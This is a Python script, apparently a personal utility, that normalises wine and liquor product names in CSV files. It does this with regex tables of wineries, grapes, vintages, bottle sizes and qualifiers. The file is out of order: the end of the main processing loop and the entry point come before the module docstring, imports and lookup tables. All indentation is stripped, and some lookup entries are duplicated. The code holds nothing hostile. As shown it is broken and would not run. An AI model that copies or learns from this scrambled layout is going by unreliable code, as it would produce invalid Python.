rec[fldWineDescrNew] = rec[fldWineDescr]
winery, reWinery = findWinery(rec, None, None, fldWine, debug=debug)
if winery is None:
if debug:
print('setWinery:winery not found-next record:' + rec[fldWine])
continue
elif winery not in wgLookup:
if debug:
print('setWinery:winery not in wgLookup:', winery)
continue
grape, reGrape = findGrapeByRegex(rec, fldWine, debug=debug)
if debug:
print('setWinery:grape found:', grape)
if winery in ignoreGrapeLookup:
if debug:
print(
'setWinery:winery-match-ignoreGrape:clear-wine:set-grape-to-None:set-nongrape-True:winery:'
, winery)
wine = ''
grape = None
nongrape = True
if winery in noGrapeLookup:
if debug:
print('setWinery:noGrapeLookup wine check:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWine], [],
'noGrapeLookup', wineAbbrLookup, debug=debug)
if debug:
print('setWinery:nogrape check:wine:', wine)
if wine == '':
if debug:
print(
'setWinery:noGrapeLookup:matched:None::clear grape:set nongrape to True'
)
grape = None
wine = ''
nongrape = True
elif wine:
grape = None
if debug:
print(
'setWinery:nograpeLookup:wine found - clear grape field'
)
if wine is None and winery in liquorLookup:
if debug:
print('setWinery:liqourLookup:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('setWinery:liquorLookup-match:', liquor)
if not grape and not nongrape and not wine and liquor is None:
if debug:
print('setWinery:did not find grape-skipping record:', rec[
fldWineDescr])
continue
if debug:
print('setWinery:pre-vintage found values for wine/liquor:',
wine, ':grape:', grape)
vintage = findVintage(rec, fldWine, debug=debug)
if debug:
print('setWinery:vintage:', vintage)
if reCase.search(rec[fldWine]):
case = 'case'
for size, reSize in sizeLookup:
if debug:
print('setWinery:sizeLookup:', size)
if reSize.search(rec[fldWine]) and not reShipsAs.search(rec[
fldWine]):
if debug:
print('setWinery:sizeLookup:matched:', reSize)
break
else:
size = None
if debug:
print('setWinery:sizeLookup:None-found')
qual = findQualifier(rec[fldWine], debug=debug)
if debug:
try:
print('setWinery:FinalAttributes:', winery, ':', grape, ':',
wine, ':', liquor, ':', vintage, ':', case, ':', size,
':', qual, ':', rec[fldWine])
except Exception as e:
print('debug error5-continuing:', str(e))
print('fldWine:', fldWine)
if liquor is not None:
if debug:
print(
'setWinery:liquor flag set - no additional data needs to be collected'
)
elif wine is not None:
if debug:
print(
'setWinery:wine is not None - do additional lookups:wine:',
wine)
if wine in wgLookup[winery] and wgLookup[winery][wine]:
if debug:
print('setWinery:lookup winematchset')
winematchset = findAddAttribWgLookup(rec, winery, wine,
fldWine, wineAbbrLookup, None, valueDescr='wine', debug
=debug)
else:
print('setWinery:unable to perform wgLookup on winery:',
winery, ':wine:', wine, ':rec-wine:', rec[fldWine])
if debug:
try:
print('wgLookup[winery]:', wgLookup[winery])
except Exception as e:
print('debug error3-continuing:', str(e))
print('winery:', winery)
if debug:
print('setWinery:winematchset:', winematchset)
elif grape is not None:
if debug:
print('setWinery:grape is not None - do additional lookups:',
grape)
if grape in wgLookup[winery] and wgLookup[winery][grape]:
grapematchset = findAddAttribWgLookup(rec, winery, grape,
fldWine, wineAbbrLookup, defaultorderlist, valueDescr=
'grape', debug=debug)
elif grape in wgLookup[winery]:
if debug:
print(
'setWinery:grape match: matching record set is blank - no action required'
)
else:
print('setWinery:grape NONMATCH:', rec[fldWine])
if debug:
print('setWinery:liquor:', liquor, ':wine:', wine,
':grape:', grape, ':wgLookup[winery]:', wgLookup[
winery])
if debug:
print('setWinery:grapematchset:', grapematchset)
if vintage:
newVintageLookupWine = rec[fldWine]
for matchvalue in winematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:winematchset:wine-name-removal:'
, matchvalue)
for matchvalue in grapematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:grapematchset:wine-name-removal:'
, matchvalue)
if newVintageLookupWine != rec[fldWine]:
if debug:
print('setWinery:2nd-vintage:newVintageLookupWine:',
newVintageLookupWine)
newVintage = findVintage({fldWine: newVintageLookupWine},
fldWine, debug=debug)
if debug:
print('setWinery:2nd-vintage:newVintage:', newVintage)
vintage = newVintage
wineDescr = ''
if winery.startswith('z'):
vintage = None
if debug:
print('setWinery:winery starts with z: clear vintage')
if winematchset and ' '.join(winematchset) in wine:
if debug:
print('setWinery:clearing-winematchset:', winematchset,
':is-in-wine:', wine)
winematchset = []
if grapematchset and ' '.join(grapematchset) in grape:
if not (len(grapematchset) == 1 and len(grapematchset[0]) == 1):
if debug:
print('setWinery:clearing-grapematchset:',
grapematchset, ':is-in-grape:', grape)
grapematchset = []
if grapematchset and size and size in ' '.join(grapematchset):
size = ''
if winematchset and size and size in ' '.join(winematchset):
size = ''
if debug:
print('setWinery:vallist1:', [winery, grape, wine] +
grapematchset + winematchset + [vintage, size, qual, case])
print('setWinery:vallist2:', [winery, grape, wine, *
grapematchset, *winematchset, vintage, size, qual, case])
wdList = []
for val in ([winery, grape, wine] + grapematchset + winematchset +
[vintage, size, qual, case]):
if val:
wdList.append(val)
wineDescr = ' '.join(wdList)
if False:
if debug:
print('setWinery:wdList:', wdList)
if debug:
print('setWinery:wineDescr:', wineDescr)
if debug:
try:
print(':'.join(['setWinery:wineDescrList', wineDescr, rec[
fldWineDescr], str(wineDescr == rec[fldWineDescr]), rec
[fldWine]]))
except Exception as e:
print('debug error6-continuing:', str(e))
print('fldWine:', fldWine)
rec[fldWineDescrNew] = wineDescr
if fldWineDescrMatch:
rec[fldWineDescrMatch] = rec[fldWineDescr] == rec[fldWineDescrNew]
def setDigitFld2Value(wines, fld, value, debug=False):
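    # overwrite fld with value on records where the field is all digits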
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
def updateFileOptionDictCheck(optiondict, wines, header, debug=False):
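    # validate the field-name options against the file just read, derive fallbacks,
    # back up the input when it will be overwritten, and set csvdictkeys for output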
if optiondict['fldWineDescr'] not in wines[0]:
if debug:
print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:'
, optiondict['fldWineDescr'])
if 'cnt' in wines[0]:
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
print(
'setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew'
)
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
print('could not find fldWineDescr in wines[0]-aborting:',
optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
        error = wines[0][optiondict['fldWineDescr']]  # force a KeyError (abort) if the chosen field is still missing
if False and optiondict['fldWineDescr'] == 'winedescr':
if not optiondict['fldWineDescrMatch']:
optiondict['fldWineDescrMatch'] = 'same'
print('setting value fldWineDescrMatch to: same')
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
file_path, base_filename, file_ext = kvutil.filename_split(optiondict
['csvfile_update_in'])
backupfile = kvutil.filename_proper(base_filename + optiondict[
'backupfile_ext'], file_path)
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
if optiondict['fldWineDescrNew'] == 'cnt':
optiondict['csvdictkeys'] = ['cnt', 'date', 'search', 'store',
'wine', 'winesrt']
elif optiondict['fldWineDescrMatch']:
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'], optiondict
['fldWineDescrNew'], optiondict['fldWineDescrMatch'], *header]
else:
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:
]
print('updateFileOptionDictCheck:set csvdictkeys to:', optiondict[
'csvdictkeys'])
if __name__ == '__main__':
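    # main flow: parse options, read the master file, build wgLookup, read the
    # update file, rewrite the descriptions, and save the results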
optiondict = kvutil.kv_parse_command_line(optiondictconfig, debug=False)
ppFlag = optiondict['pprint']
setOptionDictMasterFldValues(optiondict, debug=False)
if optiondict['setup_check']:
print('Running global variable check')
globalVariableCheck(debug=optiondict['debug'])
sys.exit()
print('reading in master file:', optiondict['csvfile_master_in'])
wines, header = kvcsv.readcsv2list_with_header(optiondict[
'csvfile_master_in'], headerlc=True)
wgLookup = buildWineryGrapeLookup(wines, optiondict[
'fldWineDescrMaster'], optiondict['fldWineMaster'], debug=
optiondict['debug'])
if optiondict['csvfile_master_in'] != optiondict['csvfile_update_in']:
print('reading in update file:', optiondict['csvfile_update_in'])
wines, header = kvcsv.readcsv2list_with_header(optiondict[
'csvfile_update_in'], headerlc=True)
if not wines:
print(
'wineset.py - no records read in - no work to be done - exiting'
)
sys.exit()
updateFileOptionDictCheck(optiondict, wines, header, debug=optiondict[
'debug'])
setWineryDescrFromWineryGrapeLookup(wgLookup, wines, optiondict[
'fldWineDescr'], optiondict['fldWine'], optiondict[
'fldWineDescrNew'], optiondict['fldWineDescrMatch'], debug=
optiondict['debug'])
if optiondict['defaultnew'] is not None:
print('Setting ', optiondict['fldWineDescrNew'], ' to ', optiondict
['defaultnew'], 'if not set')
setDigitFld2Value(wines, optiondict['fldWineDescrNew'], optiondict[
'defaultnew'], debug=optiondict['debug'])
kvcsv.writelist2csv(optiondict['csvfile_update_out'], wines, optiondict
['csvdictkeys'])
print('Saved results to:', optiondict['csvfile_update_out'])
'''
@author: Ken Venner
@contact: [email protected]
@version: 1.13
Read in a file of wine names and create consistent wine descriptions
from these names.
'''
import kvutil
import kvcsv
import re
import sys
import shutil
# may comment out in the future
import pprint
pp = pprint.PrettyPrinter(indent=4)
ppFlag = False
# application variables
optiondictconfig = {
'AppVersion' : {
'value' : '1.13',
'description' : 'defines the version number for the app',
},
'debug' : {
'value' : False,
'type' : 'bool',
'description' : 'defines if we are running in debug mode',
},
'verbose' : {
'value' : 1,
'type' : 'int',
'description' : 'defines the display level for print messages',
},
'setup_check' : {
'value' : False,
'type' : 'bool',
'description' : 'defines if we checking out setup',
},
'pprint' : {
'value' : False,
'type' : 'bool',
'description' : 'defines if we output with pretty print when debugging',
},
'csvfile_master_in' : {
'value' : 'wine_xref.csv',
'description' : 'defines the name of the master data input file',
},
'csvfile_update_in' : {
'value' : 'wineref.csv',
'description' : 'defines the name of the input file to updated',
},
'csvfile_update_out' : {
'value' : 'wineref2.csv',
'description' : 'defines the name of the updated output file',
},
'fldWine' : {
'value' : 'wine',
'description' : 'defines the name of the field that holds the Wine ',
},
'fldWineDescr' : {
'value' : 'winedescr',
'description' : 'defines the name of the field holding the wine description',
},
'fldWineDescrNew' : {
'value' : 'winedescrnew',
'description' : 'defines the name of the NEW field holding the new description ',
},
'fldWineDescrMatch' : {
'value' : None,
'description' : 'defines the name of the NEW field holding the results of comparison existing to new description ',
},
'fldWineMaster' : {
'value' : None,
'description' : 'defines the name of the field that holds the Wine when reading the master file ',
},
'fldWineDescrMaster' : {
'value' : None,
'description' : 'defines the name of the field holding the wine description when reading the master file',
},
'backupfile_ext' : {
'value' : '.bak',
'description' : 'defines the extension to use to copy the update input file to if we are replacing it with output',
},
'defaultnew' : {
'value' : None,
'description' : 'defines if we should take field fldWineDescrNew and set to a value if not set',
},
}
### GLOBAL VARIABLES / LOOKUPS ########################################
# regex search for vintage in wine name
vintageLookup = (
    re.compile(r'\d\d\d\d\s+\d\d(\d\d)'), # two years together - get this one over early
    re.compile(r'^\d\d(\d\d)'), # four position start of line
    re.compile(r'\s\d\d(\d\d)$'), # four position end of line
    re.compile(r'\s\d\d(\d\d)\s'), # four position middle of line
    re.compile(r'XX\d\d(\d\d)\s'), # four position preceded by XX
    re.compile(r'\s\d\d(\d\d)\/'), # four position split
    re.compile(r'\s\'?(\d\d)\'?$|\s\'?(\d\d)\'?\s'), # two position date with optional apostrophe front or back
)
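# illustrative matches (hypothetical wine strings, shown only as documentation):
#   'Caymus 2014 Cab'   -> captures '14' (four position middle of line)
#   "Kistler '12 Chard" -> captures '12' (two position with apostrophe)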
# regex search for case in wine name
reCase = re.compile(r'12\s*X\s*750\s*ML|\bcase\b|12\/750\s*ML',re.IGNORECASE)
# regex to pick up qualifiers from the wine
reQualLookup = (
(None, re.compile(r'\bWithout\s+Gift\b|\bNo\s+Gift', re.IGNORECASE)), # the none gift do them first
('Gift', re.compile(r'\bGift\b', re.IGNORECASE)),
('VAP', re.compile(r'\bVAP\b', re.IGNORECASE)),
('VAP', re.compile(r'\bGlassVAP\b', re.IGNORECASE)),
('Glass', re.compile(r'\bGlass\b', re.IGNORECASE)),
('Glass', re.compile(r'\bGlasses\b', re.IGNORECASE)),
('Etch', re.compile(r'\bEtch\b', re.IGNORECASE)),
('Basket', re.compile(r'\bBasket\b', re.IGNORECASE)),
)
# regex search to define the size of the wine bottle
sizeLookup = (
('1.75L', re.compile(r'\b1\.75\s*Li?|\b1\.75$', re.IGNORECASE)),
('1.5L', re.compile(r'\b1\.5\s*L?\b|\bMagnum\b', re.IGNORECASE)),
('375mL', re.compile(r'Half\s+Bottle|375ml', re.IGNORECASE)),
('200mL', re.compile(r'\b200\s*ML|\(200\s*ML', re.IGNORECASE)),
('50mL', re.compile(r'\b50\s*ML|\(50\s*ML', re.IGNORECASE)),
('500mL', re.compile(r'\b500\s*ML|\(500\s*ML', re.IGNORECASE)),
('3L', re.compile(r'\b3\s*Li?', re.IGNORECASE)),
('6L', re.compile(r'\b6\s*Li?', re.IGNORECASE)),
('9L', re.compile(r'\b9\s*Li?', re.IGNORECASE)),
('1L', re.compile(r'\b1L\b|\b1\s+L$|\b1.0\s*L\b|\b1\s+Liter\b|\bOne\s+Liter\b|\bLITER\b|\b1\s*LTR', re.IGNORECASE)),
)
# regex extract winery names from the wine field
wineryLookup = (
('Alban', re.compile(r'\bAlban\b', re.IGNORECASE)),
('Arrowood', re.compile(r'\bArrowood\b', re.IGNORECASE)),
('Atalon', re.compile(r'\bAtalon\b', re.IGNORECASE)),
('Attune', re.compile(r'\bAttune\b', re.IGNORECASE)),
('Auteur', re.compile(r'\bAuteur\b', re.IGNORECASE)),
('Austin Hope', re.compile(r'\bAustin\s+Hope\b', re.IGNORECASE)),
('Badge', re.compile(r'\bBadge\b', re.IGNORECASE)),
('Balletto', re.compile(r'\bBalletto\b', re.IGNORECASE)),
('Bell', re.compile(r'\bBell\s+Cellar', re.IGNORECASE)),
('BR Cohn', re.compile(r'\bB\.?\s?R\.?\s+Cohn\b', re.IGNORECASE)),
('Bremer', re.compile(r'\bBremer\b', re.IGNORECASE)),
('Brewer-Clifton', re.compile(r'\bBrewer[\s\-]Clifton\b', re.IGNORECASE)),
('BV', re.compile(r'\bBeaulieu\s+V|\bBV\b', re.IGNORECASE)),
('Belle Glos', re.compile(r'\bBelle\s+Glos\b', re.IGNORECASE)),
('Bennett Ln', re.compile(r'\bBennet+\sLane\b', re.IGNORECASE)),
('Benovia', re.compile(r'\bBenovia\b', re.IGNORECASE)),
('Beringer', re.compile(r'\bBeringer\b', re.IGNORECASE)),
('Blackstone', re.compile(r'\bBlackstone\b', re.IGNORECASE)),
('Brancott', re.compile(r'\bBrancott\b', re.IGNORECASE)),
('Cade', re.compile(r'\bCade\b', re.IGNORECASE)),
('Cain Five', re.compile(r'\bCain\s+Five\b|\bCain\s-\sFive\b|\bCain\s5\b|\bCainFive\b', re.IGNORECASE)),
('Cakebread', re.compile(r'\bCakebread\b', re.IGNORECASE)),
('Cardinale', re.compile(r'\bCardinale\b', re.IGNORECASE)),
('Caymus', re.compile(r'\bCaymus\b', re.IGNORECASE)),
('Chappellet', re.compile(r'\bChappellet\b', re.IGNORECASE)),
('Chalk Hill', re.compile(r'\bChalk\s+Hill\b', re.IGNORECASE)),
('Clos Du Bois', re.compile(r'\bClos\s+Du\s+Bois\b', re.IGNORECASE)),
('ClosDuVal', re.compile(r'\bClos\s+du\s+Val\b', re.IGNORECASE)),
('Colgin', re.compile(r'\bColgin\b', re.IGNORECASE)),
('Concha Don Melchor', re.compile(r'\bConcha\s.*Don\s+Melchor\b|Don\s+Melchor\b', re.IGNORECASE)),
('Continuum', re.compile(r'\bContinuum\b', re.IGNORECASE)),
('Corison', re.compile(r'\bCorison\b', re.IGNORECASE)),
('Cristal', re.compile(r'Roederer\s?.*Cristal\b|\bCristal\b.+Brut', re.IGNORECASE)),
('Curran', re.compile(r'\bCurran\b', re.IGNORECASE)),
('Darioush', re.compile(r'\bDarioush\b', re.IGNORECASE)),
('Darioush', re.compile(r'\bCaravan\b', re.IGNORECASE)),
('David Arthur', re.compile(r'\bDavid\s+Arthur\b', re.IGNORECASE)),
('David Bruce', re.compile(r'\bDavid\s+Bruce\b', re.IGNORECASE)),
('Davis Family', re.compile(r'\bDavis\s+Family\b', re.IGNORECASE)),
('Del Dotto', re.compile(r'\bDel\s+Dotto\b', re.IGNORECASE)),
('Dominus', re.compile(r'\bDominus\b', re.IGNORECASE)),
('Goldeneye', re.compile(r'\bGoldeneye\b', re.IGNORECASE)), # before duckhorn
('Paraduxx', re.compile(r'\bParaduxx\b', re.IGNORECASE)), # before duckhorn
('Domaine Carneros', re.compile(r'\bDomaine\s+Carneros\b', re.IGNORECASE)),
('Drappier', re.compile(r'\bDrappier\b', re.IGNORECASE)),
('Duckhorn', re.compile(r'\bDuckhorn\b', re.IGNORECASE)),
('Dumol', re.compile(r'\bDumol\b', re.IGNORECASE)),
('Dunn', re.compile(r'\bDunn\b', re.IGNORECASE)),
('Ehlers', re.compile(r'\bEhlers\b', re.IGNORECASE)),
('Etude', re.compile(r'\bEtude\b', re.IGNORECASE)),
('Far Niente', re.compile(r'\bFar Niente\b', re.IGNORECASE)),
('Flora', re.compile(r'\bFlora\s+Springs\b', re.IGNORECASE)),
('Flowers', re.compile(r'\bFlowers\b', re.IGNORECASE)),
('Robert Foley', re.compile(r'\bRobert\s+\bFoley\b', re.IGNORECASE)), #before Foley
('Foley', re.compile(r'\bFoley\b', re.IGNORECASE)),
('Foxen', re.compile(r'\bFoxen\b', re.IGNORECASE)),
('Franciscan', re.compile(r'\bFranciscan\b', re.IGNORECASE)),
('Frank Family', re.compile(r'\bFrank Family\b', re.IGNORECASE)),
('Gary Farrell', re.compile(r'\bGary\s+Farrel+\b', re.IGNORECASE)),
('Ghost Block', re.compile(r'\bGhost\s+Block\b', re.IGNORECASE)),
('Grgich', re.compile(r'\bGrgich\b', re.IGNORECASE)),
('Groth', re.compile(r'\bGroth\b', re.IGNORECASE)),
('Gundlach', re.compile(r'\bGundlach\b', re.IGNORECASE)),
('Hansel', re.compile(r'\bHansel\b', re.IGNORECASE)),
('Hanzell', re.compile(r'\bHanzell\b', re.IGNORECASE)),
('Hess', re.compile(r'\bHess\b', re.IGNORECASE)),
('Hewitt', re.compile(r'\bHewitt\b', re.IGNORECASE)),
('Hobbs', re.compile(r'\bHobbs\b|\bcrossbarn\b', re.IGNORECASE)),
('Hundred Acre', re.compile(r'\bHundred\s+Acre\b', re.IGNORECASE)),
('Jordan', re.compile(r'\bJordan\b', re.IGNORECASE)),
('Justin', re.compile(r'\bJustin\b', re.IGNORECASE)),
('Kim Crawford', re.compile(r'\bKim\s+Crawford\b', re.IGNORECASE)),
('Kistler', re.compile(r'\bKistler\b', re.IGNORECASE)),
('Kosta', re.compile(r'\bKosta\s+Browne?\b', re.IGNORECASE)),
('Krug', re.compile(r'\bKrug\b', re.IGNORECASE)),
('Kunde', re.compile(r'\bKunde\b', re.IGNORECASE)),
('LaCrema', re.compile(r'\bLa\s?Crema\b', re.IGNORECASE)),
('Lewis', re.compile(r'\bLewis\b', re.IGNORECASE)),
('Lokoya', re.compile(r'\bLokoya\b', re.IGNORECASE)),
('Meiomi', re.compile(r'\bMeiomi\b', re.IGNORECASE)),
('Melville', re.compile(r'\bMelville\b', re.IGNORECASE)),
('Momento Mori', re.compile(r'\bMomento\s+Mori\b', re.IGNORECASE)),
('Mondavi', re.compile(r'\bMondavi\b', re.IGNORECASE)),
('Montelena', re.compile(r'\bMontelena\b', re.IGNORECASE)),
('Mt Veeder', re.compile(r'^Mount\s+Veeder\b|^Mt\.? Veeder\b|\d+\s+M[^t]*t\s+Veeder\b', re.IGNORECASE)),
('Newton', re.compile(r'\bNewton\b', re.IGNORECASE)),
('Nickel', re.compile(r'\bNickel\b', re.IGNORECASE)),
('Opus One', re.compile(r'\bOpus\s+One\b', re.IGNORECASE)),
('P Togni', re.compile(r'\bTogni\b', re.IGNORECASE)),
('Pahlmeyer Jayson', re.compile(r'\bJayson\b', re.IGNORECASE)), # this before pahlmeyer
('Pahlmeyer', re.compile(r'\bPahlmeyer\b(?!\s*Jay)', re.IGNORECASE)),
('Papillon', re.compile(r'\bPapillon\b', re.IGNORECASE)),
('Patz', re.compile(r'\bPatz\b', re.IGNORECASE)),
('Phelps', re.compile(r'\bPhelps\b', re.IGNORECASE)),
('Plumpjack', re.compile(r'\bPlumpjack\b', re.IGNORECASE)),
('Pride', re.compile(r'\bPride\b', re.IGNORECASE)),
('Prisoner', re.compile(r'\bPrisoner\b', re.IGNORECASE)),
('Provenance', re.compile(r'\bProvenance\b', re.IGNORECASE)),
('R Sinskey', re.compile(r'\bSinskey\b', re.IGNORECASE)),
('Ramey', re.compile(r'\bRamey\b', re.IGNORECASE)),
('Revana', re.compile(r'\bRevana\b', re.IGNORECASE)),
('Raptor', re.compile(r'\bRaptor\s+Ridge\b', re.IGNORECASE)),
('Revana', re.compile(r'\bRevana\b', re.IGNORECASE)),
('Ridge', re.compile(r'\bRidge\b', re.IGNORECASE)),
('Robert Foley', re.compile(r'\bRobert\s+Foley\b', re.IGNORECASE)),
('Rombauer', re.compile(r'\bRombauer\b', re.IGNORECASE)),
('Rudd', re.compile(r'\bRudd\b', re.IGNORECASE)),
('Scarecrow', re.compile(r'\bScarecrow\b', re.IGNORECASE)),
('Sea Smoke', re.compile(r'\bSea\s+Smoke\b', re.IGNORECASE)),
('Seghesio', re.compile(r'\bSeghesio\b', re.IGNORECASE)),
('Shafer', re.compile(r'\bShafer\b', re.IGNORECASE)),
('Sherwin', re.compile(r'\bSherwin\b', re.IGNORECASE)),
('Silver Oak', re.compile(r'\bSilver\s+Oak\b', re.IGNORECASE)),
('Silverado', re.compile(r'\bSilverado\b', re.IGNORECASE)),
('Simi', re.compile(r'\bSimi\b', re.IGNORECASE)),
('Sonoma Cutrer', re.compile(r'\bCutrer\b', re.IGNORECASE)),
('Spottswoode', re.compile(r'\bSpottswoode\b', re.IGNORECASE)),
('Stag Leap', re.compile(r'\bStag.*\sLeap\b', re.IGNORECASE)),
('Sullivan', re.compile(r'\bSullivan\b', re.IGNORECASE)),
('Summerland', re.compile(r'\bSummerland\b', re.IGNORECASE)),
('Summers', re.compile(r'\bSummers\b', re.IGNORECASE)),
('Tantara', re.compile(r'\bTantara\b', re.IGNORECASE)),
('Turnbull', re.compile(r'\bTurnbull\b', re.IGNORECASE)),
('Veuve', re.compile(r'\bVeuve\b', re.IGNORECASE)),
('Viader', re.compile(r'\bViader\b', re.IGNORECASE)),
('Waterstone', re.compile(r'\bWaterstone\b', re.IGNORECASE)),
('Whitehall', re.compile(r'\bWhitehall\b', re.IGNORECASE)),
('Wm Selyem', re.compile(r'\bWilliams\s*\-?Selyem\b', re.IGNORECASE)),
('ZD', re.compile(r'\bZD\b', re.IGNORECASE)),
('Zaca', re.compile(r'\bZaca\b', re.IGNORECASE)),
('zBourbon Woodford Res', re.compile(r'\bWoodford\s+Reserve\b', re.IGNORECASE)),
('zBourbon Woodford Res', re.compile(r'\bWoodford\s+Rsv\b', re.IGNORECASE)),
('zCognac Courvoisier', re.compile(r'\bCourvoisier\b', re.IGNORECASE)),
('zCognac Hennessy', re.compile(r'\bHennesse?y\b', re.IGNORECASE)),
('zCognac Remy', re.compile(r'\bRemy\s+Martin\b|\bRemy\s+Louis', re.IGNORECASE)),
('zCointreau', re.compile(r'\bCointreau\b', re.IGNORECASE)),
('zGin Hendrick', re.compile(r'\bHendrick', re.IGNORECASE)),
('zGin Tanqueray', re.compile(r'\bTanqueray\b', re.IGNORECASE)),
('zRum Mt Gay', re.compile(r'\bMount\s+Gay\b|\bMt\s+Gay', re.IGNORECASE)),
('zRum Ron Zacapa', re.compile(r'\bRon\s+Zacapa\b', re.IGNORECASE)),
('zRye Hayden', re.compile(r'\bBasil\s+Hayden\b', re.IGNORECASE)),
('zSambuca', re.compile(r'\bSambuca\b', re.IGNORECASE)),
('zScotch Glenmorangie', re.compile(r'\bGlenmorangie\b', re.IGNORECASE)),
('zScotch Hibiki Harmony', re.compile(r'\bHibiki\s.*Harmony\b', re.IGNORECASE)),
('zScotch Hibiki', re.compile(r'\bHibiki\b(?!\s*Har)', re.IGNORECASE)),
('zScotch Macallan', re.compile(r'\bMacallan\b', re.IGNORECASE)),
('zTeq Campo Azul', re.compile(r'\bCampo\s+Azul\b', re.IGNORECASE)),
('zTeq Casamigos', re.compile(r'\bCasamigos\b', re.IGNORECASE)),
('zTeq Casino Azul', re.compile(r'\bCasino\s+Azul\b', re.IGNORECASE)),
('zTeq Clase Azul', re.compile(r'\bClase\s+Azul\b', re.IGNORECASE)),
('zTeq Cuervo', re.compile(r'\bJose\s+Cuervo\b|^Cuervo\b', re.IGNORECASE)),
('zTeq Don Julio', re.compile(r'\bDon\s+Julio\b', re.IGNORECASE)),
    ('zTeq Dos Artes', re.compile(r'\bDos\s+Artes\b', re.IGNORECASE)),
('zTeq Gran Cava', re.compile(r'\bGran\s+Cava\b', re.IGNORECASE)),
('zTeq Herradura', re.compile(r'\bHerradura\b', re.IGNORECASE)),
('zTeq Loma Azul', re.compile(r'\bLoma\s+Azul\b', re.IGNORECASE)),
('zTeq Padre Azul', re.compile(r'\bPadre\s+Azul\b', re.IGNORECASE)),
('zTeq Partida', re.compile(r'\bPartida\b', re.IGNORECASE)),
('zTeq Patron', re.compile(r'\bPatron\b', re.IGNORECASE)),
('zTripleSec Gr Marnier', re.compile(r'\bGrand\s+Marnier\b', re.IGNORECASE)),
('zTripleSec Dekuyper', re.compile(r'\bDekuyper\b', re.IGNORECASE)),
('zTripleSec Hiram', re.compile(r'\bHiram\b', re.IGNORECASE)),
('zVodka Absolut', re.compile(r'\bAbsolut\b', re.IGNORECASE)),
('zVodka Skyy', re.compile(r'\bSkyy\b', re.IGNORECASE)),
('zVodka Tito', re.compile(r'\bTito', re.IGNORECASE)),
('zWhiskey Balvenie', re.compile(r'\bBalvenie\b', re.IGNORECASE)),
('zWhiskey J Walker', re.compile(r'\bJohn+ie\s+Walker\b', re.IGNORECASE)),
# ('', re.compile(r'\b\b', re.IGNORECASE)),
)
# regex extract the grape from the wine fld
grapeLookup = (
('Cab Franc', re.compile(r'\bCabernet\s+Franc|\bCab\s+Franc', re.IGNORECASE)), # before cab
('Cab', re.compile(r'\bCabernet\b|\sCS\s|\sCS$|\bCab\b', re.IGNORECASE)),
('Claret', re.compile(r'\bClaret\b', re.IGNORECASE)),
('Rose Pinot', re.compile(r'\bRose\b.*\bPinot\b|\bPinot\b.*\bRose\b', re.IGNORECASE)),
('Pinot', re.compile(r'\bPinot\b|\bPN\b|\bP\s+Noir\b', re.IGNORECASE)),
('Merlot', re.compile(r'\bMerlot\b|\bME\b', re.IGNORECASE)),
('Sauv Blanc', re.compile(r'\bSauvignon\s+Blanc\b|\bSB\b', re.IGNORECASE)),
('Sauv Blanc', re.compile(r'\bSauvignon\/Fume\s+Blanc\b', re.IGNORECASE)),
('Meritage', re.compile(r'\bMeritage\b', re.IGNORECASE)),
('Fume', re.compile(r'\bFume\b|\bFumé', re.IGNORECASE)),
('Champagne', re.compile(r'\bChampagne\b', re.IGNORECASE)),
('Chard', re.compile(r'\bChar+d|\bCH\b', re.IGNORECASE)),
('Shiraz', re.compile(r'\bShiraz\b', re.IGNORECASE)),
('Syrah', re.compile(r'\bSyrah\b|\bSY\b',re.IGNORECASE)),
('Zin', re.compile(r'\bZinfandel\b|\bZIN\b|\bZN\b', re.IGNORECASE)),
('Rose', re.compile(r'\bRose\b|\bRosé', re.IGNORECASE)),
    ('Sangiovese', re.compile(r'\bSangiovese\b', re.IGNORECASE)),
# ('Brandy', re.compile(r'\bBrandy\b', re.IGNORECASE)),
('Gewurzt', re.compile(r'\bGew.rztraminer\b|\bGewürzt', re.IGNORECASE)),
('Malbec', re.compile(r'\bMalbec\b', re.IGNORECASE)),
('Viognier', re.compile(r'\bViognier\b', re.IGNORECASE)),
('Roussanne', re.compile(r'\bRoussanne\b', re.IGNORECASE)),
('Charbono', re.compile(r'\bCharbono\b', re.IGNORECASE)),
('PSirah', re.compile(r'\bPetite Sirah\b', re.IGNORECASE)),
('Cuvee', re.compile(r'\bCuvee\b', re.IGNORECASE)),
('Red', re.compile(r'\bRed\b|\bBordeaux\s+Blend\b', re.IGNORECASE)),
('Syrah-Cab', re.compile(r'\bSyrcab\b|\bsyrah[-\s\/]+cab', re.IGNORECASE)),
('Grenache', re.compile(r'\bGrenache\b', re.IGNORECASE)),
('Tempranillo', re.compile(r'\bTempranillo\b', re.IGNORECASE)),
)
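# note: tuple order matters - 'Cab Franc' must precede 'Cab', and 'Rose Pinot' must
# precede both 'Pinot' and 'Rose', because the first matching regex wins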
# wineries that we don't want to look up the grape on
ignoreGrapeLookup = {
'Cristal' : ['Rose', None],
'Domaine Carneros' : ['Brut', None],
'Dominus' : [None],
'Papillon' : None,
'Paraduxx' : None,
'Veuve' : None,
'zCointreau' : None,
'zGin Hendrick' : None,
'zGin Tanqueray' : ['Ten', None],
'zTripleSec Gr Marnier' : ['1880', '100th', 'Cent', 'Quin', None],
'zTripleSec Dekuyper' : None,
'zTripleSec Hiram' : None,
'zVodka Skyy' : ['Citrus', None],
'zVodka Tito' : None,
# 'Prisoner' : ['Cuttings', 'Red', 'Derange', 'Saldo', 'Blindfold', None],
}
